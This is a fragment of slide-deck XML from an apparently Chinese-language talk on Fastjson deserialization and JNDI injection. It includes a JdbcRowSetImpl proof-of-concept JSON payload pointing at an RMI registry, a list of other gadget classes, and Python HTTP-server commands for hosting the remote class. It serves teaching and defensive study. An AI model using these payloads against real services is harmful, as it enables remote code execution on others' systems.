              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0"/>
              <a:t>Registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>绑定一个指向远程类的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0"/>
              <a:t>Reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>对象（当对象为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0"/>
              <a:t>Reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>类型的时候，应用会加载远程类并实例化），远程类的静态代码块及构造方法均可控，从而导致任意代码执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>下面以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1"/>
              <a:t>com.sun.rowset.JdbcRowSetImpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>类为例具体解释下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>基于类com.sun.rowset.JdbcRowSetImpl的POC如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"@type"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"com.sun.rowset.JdbcRowSetImpl"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"dataSourceName"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"rmi://localhost:1097/Object"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"autoCommit"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fastjson在反序列化的时候，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>会构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>对象，然后调用对象的setter方法。在解析上述json字符串时，首先构造JdbcRowSetImpl对象，然后调用setDataSourceName方法和setAutoCommit方法为对象赋值，在调用setAutoCommit方法时，会通过connect方法调用lookup方法向Registry发出查询请求，而Registry的地址正是dataSourceName的值，这就导致了lookup方法参数可控，进而我们可以通过自定义Registry实现进一步漏洞利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>connect方法代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23462306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hape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1848249" y="5933250"/>
            <a:ext cx="8416627" cy="1768160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="48220" tIns="48220" rIns="48220" bIns="48220" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1285875">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr sz="7600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei"/>
                <a:ea typeface="Microsoft YaHei"/>
                <a:cs typeface="Microsoft YaHei"/>
                <a:sym typeface="Microsoft YaHei"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="8000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>一、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="8000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="8000" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2410480097"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030681" y="2184008"/>
            <a:ext cx="22625731" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>类似的，除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1"/>
              <a:t>com.sun.rowset.JdbcRowSetImpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>外，还有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1"/>
              <a:t>org.springframework.jndi.support.SimpleJndiBeanFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>com.mchange.v2.c3p0.JndiRefForwardingDataSource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1"/>
              <a:t>org.apache.ibatis.datasource.jndi.JndiDataSourceFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1"/>
              <a:t>org.hibernate.jmx.StatisticsService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>等等都可以成为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>Gadget”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>中的一环，基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>注入实现代码执行。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>类库何其多，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>JDK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>中的、第三方的，未来也一定会出现更多的可被恶意利用的类库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="8025154"/>
            <a:ext cx="22625730" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>在高版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JDK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>中做了对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>注入类攻击的防护，主要是通过限制远程类的加载实现，具体细节可以参考我的这篇文章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.cnblogs.com/Welk1n/p/11066397.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>，其中有比较详细的防护原理以及某些条件下的防护绕过说明。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230917427"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1030682" y="3583037"/>
            <a:ext cx="16767411" cy="6829056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="0" tIns="0" rIns="0" bIns="179331"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4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Python3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>启用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>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800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>python3 -m http.server 80</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>0 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>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4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Python2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>启用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>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800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>python -m SimpleHTTPServer 80</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>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4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在浏览器中访问 http://localhost:80</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>0，果然可以</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>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4800" dirty="0">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4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>当然也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
